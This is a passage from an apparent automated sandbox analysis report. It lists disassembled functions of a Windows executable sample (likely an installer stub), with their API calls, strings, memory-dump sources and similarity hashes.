Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D

Function 00405C2D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405C56
lstrcatW.KERNEL32(00424F10,\*.*), ref: 00405C9E
lstrcatW.KERNEL32(?,0040A014), ref: 00405CC1
lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405CC7
FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405CD7
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
FindClose.KERNEL32(00000000), ref: 00405D86

Strings

\*.*, xrefs: 00405C98
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C3A

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1117835029
Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 542301482-3291747264
Opcode ID: d5992b275958797d45e0307967f226c0e94861c2e3f740a4b3dedb0ac196cb80
Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
Opcode Fuzzy Hash: d5992b275958797d45e0307967f226c0e94861c2e3f740a4b3dedb0ac196cb80
Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e451494837d02e9de811704e2342817bf1df0b816b53b23ee01b1b597b483687
Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
Opcode Fuzzy Hash: e451494837d02e9de811704e2342817bf1df0b816b53b23ee01b1b597b483687
Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A

Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F25
GetDlgItem.USER32(?,00000408), ref: 00404F30
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
DeleteObject.GDI32(00000000), ref: 00405007
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109

Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
GetWindowLongW.USER32(?,000000F0), ref: 0040514B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
ShowWindow.USER32(?,00000005), ref: 00405169
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
ImageList_Destroy.COMCTL32(?), ref: 00405337
GlobalFree.KERNEL32(?), ref: 00405347
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
SendMessageW.USER32(?,00001102,?,?), ref: 00405469
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
ShowWindow.USER32(?,00000000), ref: 004054F1
GetDlgItem.USER32(?,000003FE), ref: 004054FC
ShowWindow.USER32(00000000), ref: 00405503

Strings

N, xrefs: 004051A2
M, xrefs: 004050C1
, xrefs: 004054DB

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58

Function 0040465F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
GetDlgItem.USER32(?,000003E8), ref: 00404711
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
GetSysColor.USER32(?), ref: 0040473F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
lstrlenW.KERNEL32(?), ref: 00404760
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
GetDlgItem.USER32(?,0000040A), ref: 004047DB
SendMessageW.USER32(00000000), ref: 004047E2
GetDlgItem.USER32(?,000003E8), ref: 0040480D
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
SetCursor.USER32(00000000), ref: 00404861
LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
SetCursor.USER32(00000000), ref: 0040487D
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE

Strings

N, xrefs: 004047FB
: Completed, xrefs: 0040483C

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4

Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB

Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8

GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
wsprintfA.USER32 ref: 004061E6
GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
GlobalFree.KERNEL32(00000000), ref: 004062CF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6

Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

Strings

[Rename], xrefs: 00406250, 00406262
%ls=%ls, xrefs: 004061DC

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD

Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404524
GetSysColor.USER32(00000000), ref: 00404562
SetTextColor.GDI32(?,00000000), ref: 0040456E
SetBkMode.GDI32(?,?), ref: 0040457A
GetSysColor.USER32(?), ref: 0040458D
SetBkColor.GDI32(?,?), ref: 0040459D
DeleteObject.GDI32(?), ref: 004045B7
CreateBrushIndirect.GDI32(?), ref: 004045C1

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

Function 004067CF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
CharNextW.USER32(?,00434000,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034D7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067D0
*?|<>/":, xrefs: 00406821

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1439852002
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD

Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
GetMessagePos.USER32 ref: 00404E7E
ScreenToClient.USER32(?,?), ref: 00404E98
